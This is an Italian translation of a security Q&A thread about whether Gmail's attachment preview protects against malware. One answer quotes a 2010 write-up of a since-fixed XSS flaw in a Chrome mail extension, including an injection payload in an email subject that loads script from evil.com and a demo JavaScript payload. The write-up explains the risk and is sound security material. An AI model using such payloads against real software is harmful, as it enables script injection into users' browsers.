La funzione di anteprima di Gmail per i documenti nel browser impedisce il malware?

6

Sono preoccupato per l'apertura di documenti Word allegati e altri file (immagini, PDF, ecc.). Gmail ha una funzione che consente di visualizzarli in anteprima in un popup, nel browser, senza uscire dalla schermata di Gmail: sembra che abbiano reso le immagini del documento in qualche modo e le mostri invece. C'è il rischio di malware se si visualizzano i documenti in questo modo?

    
posta Brian Armstrong 25.08.2015 - 03:16
fonte

2 risposte

5

Impedirà qualsiasi sfruttamento di vulnerabilità esclusive dell'applicazione che utilizzeresti normalmente per aprire l'allegato (ad esempio, Adobe Reader, visualizzatore di immagini, ecc.)

Non impedirà lo sfruttamento delle vulnerabilità nel browser a causa del rendering dell'allegato (sebbene ciò sarebbe difficile in quanto l'utente malintenzionato dovrebbe creare un exploit del browser che funzioni con l'implementazione specifica del programma di anteprima utilizzato da Google).

E non impedirà lo sfruttamento delle vulnerabilità in nessun algoritmo o libreria condivisa con l'anteprima e la tua solita applicazione. Tuttavia, per l'anteprima, ancora una volta l'autore dell'attacco dovrebbe creare l'allegato in un modo specifico non solo per sfruttare la libreria, ma per ottenere questo exploit generare l'exploit del browser appropriato. L'exploit del browser potrebbe tuttavia assumere la forma di un semplice vettore di attacco, ad esempio un attacco XSS, che sarebbe più facile da ottenere.

    
risposta data 27.08.2015 - 14:26
fonte
2

Quando apri un documento allegato su Gmail usando la modalità di anteprima (se posso dirlo), sei più sicuro perché è solo un'immagine dell'allegato ; puoi immaginare questa immagine come uno screenshot , voglio dire aprire il documento in questo modo ti rende più sicuro perché non include le funzionalità del documento originale :

Tuttavia,unafunzionalitàsimileèoffertada Google Mail Checker Plus estensione, prevede l'anteprima di un file in una finestra pop-up come lo hai descritto. L'anteprima del file in questo modo non ti espone a rischi , proprio come nella funzionalità sopra descritta, tuttavia (un caso che riflette il commento di @ shroeder alla tua domanda) Riproduco a te un esempio di vulnerabilità che è stato sfruttato in passato consentendo un attacco XSS:

Lets look on popular (18,368 installations per week) extension called "Google Mail Checker Plus" [#]. This extension simply displays the number of unread messages in your Gmail inbox, can make preview of mail and supports desktop notifications.

.. figure:: http://oxdef.info/papers/ext/img/google_mail_checker_plus.png

Mail preview in popup of Google Mail Checker Plus

On preview we can see at least subject, from and piece of body of letter. Ok, lets send to us self letter with subject like: ::

2"'><script src="http://evil.com/own.js"></script>

own.jsissimplejavascriptdemopayload:::

document.body.innerHTML='';img=newImage();img.src='http://evil.com/stallowned.jpg';document.body.appendChild(img);

Forthefirstweseesuchnotification:

..figure::http://oxdef.info/papers/ext/img/gmail_checker_xss_notificate.png

XSS in Google Mail Checker Plus notification part

For the second we click on extension's icon and see our worked payload in popup window:

.. figure:: http://oxdef.info/papers/ext/img/gmail_checker_xss.png

XSS in Google Mail Checker Plus 

It works! By the way this XSS has been already reported_ by Lostmon in June 03, 2010 and fixed version of extension is available. Lostmon wrote that: "All extensions runs over his origin and no have way to altered data from extension or get sensitive data like , email account or password etc.."

Let's discover this web vulnerability in context of this extension to understand risks.

.. [#] https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe .. _reported: http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html .. _notifications: http://www.html5rocks.com/tutorials/notifications/quick/

    
risposta data 25.08.2015 - 07:17
fonte

Leggi altre domande sui tag